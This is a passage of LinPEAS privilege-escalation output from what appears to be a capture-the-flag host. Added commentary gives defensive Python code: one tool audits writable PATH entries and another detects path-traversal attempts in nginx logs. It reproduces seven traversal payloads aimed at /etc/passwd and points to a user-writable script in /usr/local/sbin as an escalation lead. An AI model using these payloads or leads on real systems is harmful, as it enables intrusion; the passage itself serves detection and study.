Found: /etc/mail/aliases.db: regular file, no read permission
Found: /var/lib/mlocate/mlocate.db: regular file, no read permission
Found: /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3022000
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 7 13:51 .
drwxr-xr-x 13 root root 4.0K Apr 7 13:51 ..
drwxr-xr-x 3 root root 4.0K Apr 18 12:05 html
/var/www/html:
total 36K
drwxr-xr-x 3 root root 4.0K Apr 18 12:05 .
drwxr-xr-x 3 root root 4.0K Apr 7 13:51 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout
-rw------- 1 root root 0 Aug 6 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 1531 Jan 5 10:44 /etc/apparmor.d/cache/.features
-rw-r--r-- 1 landscape landscape 0 Aug 6 2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 20 Apr 29 11:38 /run/cloud-init/.instance-id
-rw-r--r-- 1 root root 2 Apr 29 11:38 /run/cloud-init/.ds-identify.result
-rw-r--r-- 1 root root 0 Apr 29 11:38 /run/network/.ifstate.lock
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 292232 Jan 6 17:36 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 6795 Jan 5 15:02 /var/backups/apt.extended_states.6.gz
-rw-r--r-- 1 root root 2836 Jan 8 06:25 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 6805 Jan 8 16:57 /var/backups/apt.extended_states.5.gz
-rw-r--r-- 1 root root 255 Jan 14 10:20 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 63790 Apr 7 12:08 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root smmsp 65205 Jan 14 11:11 /var/backups/sendmail.cf.bak
-rw-r--r-- 1 root root 7063 Jan 14 14:24 /var/backups/apt.extended_states.4.gz
-rw-r--r-- 1 root root 147 Jan 5 10:51 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 6841 Apr 3 13:39 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root smmsp 44599 Jan 14 10:20 /var/backups/submit.cf.bak
-rw-r--r-- 1 root root 525 Jan 5 10:49 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 228 Jan 5 10:49 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root smmsp 2375 Jan 14 10:20 /var/backups/submit.mc.bak
-rw-r--r-- 1 root root 71680 Feb 1 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 7074 Jan 20 13:56 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root smmsp 4209 Jan 14 10:20 /var/backups/sendmail.mc.bak
-rw-r--r-- 1 root root 1112222 Feb 1 05:35 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 7063 Feb 1 05:45 /var/backups/apt.extended_states.2.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/svc_acc
/run/lock
/run/screen
/run/sendmail/mta/smsocket
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/tmux-1000
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory
/usr/local/sbin
/usr/local/sbin/ssh-alert.sh
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/avahi-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cloud-init.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntux2dx2dvgx2dswap.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ModemManager.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/NetworkManager.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sendmail.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/web-app.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/wpa_supplicant.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/mail
/var/tmp
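Two findings in this output point at the same place: the ".sh files in path" check reports that the current user owns /usr/local/sbin/ssh-alert.sh, and the writable-files list shows both that script and its directory /usr/local/sbin as writable. A user-writable script in a system PATH directory is a finding on its own; whether anything privileged executes it is not shown in this output, so confirming that (searching /etc for references to the path, checking cron, systemd and PAM configuration) is the next step rather than something to assume. The following is an added example, not part of LinPEAS or of this output, that re-implements the check as a function: it walks a PATH string and reports directories and regular files the given uid/groups can write to, deciding from mode bits and ownership rather than `os.access()`, so a root operator running it still sees what the low-privileged user would see. The fixture in `demo()` is constructed in a temporary directory (one locked-down directory, one loose directory holding a user-owned `ssh-alert.sh` beside a read-only script).

```python
import os
import shutil
import stat
import tempfile


def current_groups():
    """All gids the calling process carries (primary plus supplementary)."""
    return set(os.getgroups()) | {os.getgid()}


def writable_by(st, uid, gids):
    """Writability from mode bits and ownership only, with POSIX class
    precedence (owner bits decide for the owner, group bits for members,
    other bits for everyone else). os.access() is avoided on purpose: it
    answers for the calling process, so a root caller would report
    everything as writable and hide what a low-privileged user sees."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_path(path_value, uid, gids):
    """Return (writable_dirs, writable_files) for the entries of path_value.

    writable_dirs: PATH directories where the user can create or replace
    entries, i.e. drop a file that shadows a command for anyone whose PATH
    searches that directory (a sticky directory such as /tmp still allows
    creation, only replacement of others' files is blocked).
    writable_files: regular files already present that the user can modify
    in place, which is the /usr/local/sbin/ssh-alert.sh case above.
    """
    writable_dirs, writable_files = [], []
    for d in path_value.split(os.pathsep):
        if not d:
            continue
        try:
            dst = os.stat(d)
        except OSError:
            continue
        if not stat.S_ISDIR(dst.st_mode):
            continue
        if writable_by(dst, uid, gids):
            writable_dirs.append(d)
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            try:
                st = os.stat(p)  # follows symlinks: the target is what runs
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and writable_by(st, uid, gids):
                writable_files.append(p)
    return writable_dirs, writable_files


def demo():
    """Constructed fixture: 'bin' is read-only; 'local-sbin' is writable and
    holds a user-writable ssh-alert.sh next to a read-only readonly.sh."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    try:
        locked_dir = os.path.join(root, "bin")
        loose_dir = os.path.join(root, "local-sbin")
        os.mkdir(locked_dir)
        os.mkdir(loose_dir)
        owned = os.path.join(loose_dir, "ssh-alert.sh")
        readonly = os.path.join(loose_dir, "readonly.sh")
        for p in (owned, readonly):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(owned, 0o755)
        os.chmod(readonly, 0o555)
        os.chmod(loose_dir, 0o755)
        os.chmod(locked_dir, 0o555)
        dirs, files = audit_path(os.pathsep.join([locked_dir, loose_dir]),
                                 os.getuid(), current_groups())
        return ([os.path.basename(d) for d in dirs],
                [os.path.basename(f) for f in files])
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
    # Against the live environment, from the low-privileged shell:
    # print(audit_path(os.environ.get("PATH", ""), os.getuid(), current_groups()))
```

On the host above, running `audit_path` with the service account's uid would list /usr/local/sbin and /usr/local/sbin/ssh-alert.sh, matching the two LinPEAS sections. Ownership of the file is the stronger signal than a world-writable bit: a file you own can also be `chmod`ed, replaced via rename, or have its mode bits changed without tripping a world-writable scan.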
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/mail/tls/sendmail-common.key
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/pppd/2.4.7/passwordfd.so
/usr/lib/python2.7/dist-packages/keyring/credentials.py
/usr/lib/python2.7/dist-packages/keyring/credentials.pyc
/usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py
/usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc
/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.0
/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.0.0.1
/usr/lib/x86_64-linux-gnu/samba/libcmdline-credentials.so.0
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/help/C/gnome-help/user-changepassword.page
/usr/share/help/C/gnome-help/user-goodpassword.page
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg
/usr/share/icons/hicolor/16x16/apps/gcr-password.png
/usr/share/icons/hicolor/22x22/apps/gcr-password.png
/usr/share/icons/hicolor/24x24/apps/gcr-password.png
/usr/share/icons/hicolor/256x256/apps/gcr-password.png
/usr/share/icons/hicolor/32x32/apps/gcr-password.png
/usr/share/icons/hicolor/48x48/apps/gcr-password.png
/usr/share/icons/Humanity/apps/24/password.png
/usr/share/icons/Humanity/apps/48/password.svg
/usr/share/icons/Humanity/status/16/dialog-password.png
/usr/share/icons/Humanity/status/24/dialog-password.png
/usr/share/icons/Humanity/status/48/dialog-password.svg
/usr/share/man/man1/git-credential.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-store.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/usr/share/ubuntu-advantage-tools/modules/credentials.sh
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
10.10.14.17 - - [29/Apr/2022:11:43:33 +0000] "GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:35 +0000] "GET /DomainFiles/*//../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:37 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:37 +0000] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:44:04 +0000] "GET ../../../../../../../../../../etc/passw* HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:44:37 +0000] "GET ////////../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:47:05 +0000] "GET /htdocs/../../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
2022-04-29 11:38:43,010 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2022-04-29 11:38:43,010 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
Binary file /var/log/journal/68ed0714af124461afecf837a54c1b73/user-1000.journal matches
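The nginx access-log lines LinPEAS surfaced above are not credentials; they are a path-traversal probe from 10.10.14.17 against the late.htb front end, each encoded differently (`%2f`, `%2e%2e`, bare `../`, a leading `////`) and each answered with a 400. A defender reviewing this host would want the same classification done over the whole 35 MB access.log rather than the few lines a password grep happened to catch. The following is an added example, not from the page or from LinPEAS, that parses combined-format log lines, percent-decodes the request target until it is stable (so double encoding and encoded slashes are resolved), flags any request whose path contains a `..` segment, and separates attempts the server refused (4xx/5xx) from ones that got a 2xx/3xx and need a look. The seven probe lines are copied from the output above; the first, benign line is constructed so that the filter has something to pass.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Seven request lines copied from the access log shown above, preceded by one
# constructed benign request.
SAMPLE_LOG = """\
10.10.14.17 - - [29/Apr/2022:11:43:30 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.10.14.17 - - [29/Apr/2022:11:43:33 +0000] "GET /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:35 +0000] "GET /DomainFiles/*//../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:37 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:43:37 +0000] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:44:04 +0000] "GET ../../../../../../../../../../etc/passw* HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:44:37 +0000] "GET ////////../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.17 - - [29/Apr/2022:11:47:05 +0000] "GET /htdocs/../../../../../../../../../../../etc/passwd HTTP/1.1" 400 182 "-" "-"
"""

# nginx "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def decode_target(target, rounds=3):
    """Percent-decode until the value stops changing (bounded), so that
    %252e%252e (double encoding) and %2f (encoded slash) are seen the way a
    lax backend would see them after its own decoding passes."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def is_traversal(target):
    """True when any path segment is '..' after decoding. Backslashes are
    normalised to '/' because some backends accept them as separators."""
    decoded = decode_target(target).replace("\\", "/")
    path = decoded.split("?", 1)[0]
    return ".." in path.split("/")


def scan(log_text):
    """One record per parseable line; 'verdict' is set only for traversal hits:
    'blocked' when the server answered 4xx/5xx, 'needs-review' otherwise."""
    records = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("req").split(" ")
        target = parts[1] if len(parts) >= 2 else parts[0]
        hit = is_traversal(target)
        status = int(m.group("status"))
        verdict = None
        if hit:
            verdict = "blocked" if status >= 400 else "needs-review"
        records.append({"ip": m.group("ip"), "ts": m.group("ts"), "target": target,
                        "status": status, "traversal": hit, "verdict": verdict})
    return records


def summarize(records):
    """Traversal attempts per source IP and per verdict."""
    hits = [r for r in records if r["traversal"]]
    return {"by_ip": Counter(r["ip"] for r in hits),
            "by_verdict": Counter(r["verdict"] for r in hits)}


if __name__ == "__main__":
    recs = scan(SAMPLE_LOG)
    for r in recs:
        if r["traversal"]:
            print(r["ip"], r["status"], r["verdict"], r["target"])
    print(summarize(recs))
```

To run it over the real file: `scan(open("/var/log/nginx/access.log", errors="replace").read())`. The check is deliberately narrow: it only recognises a literal `..` segment after decoding, so variants such as `....//`, overlong UTF-8 encodings, or null-byte truncation pass through it; those belong in a second rule rather than in a looser regex that would also match legitimate paths. A 400 from nginx, as seen for every line above, means the request never reached the Flask app behind `proxy_pass http://127.0.0.1:8000`, but a 200 on a traversal-looking target is not proof of a file read either, hence "needs-review" rather than "success".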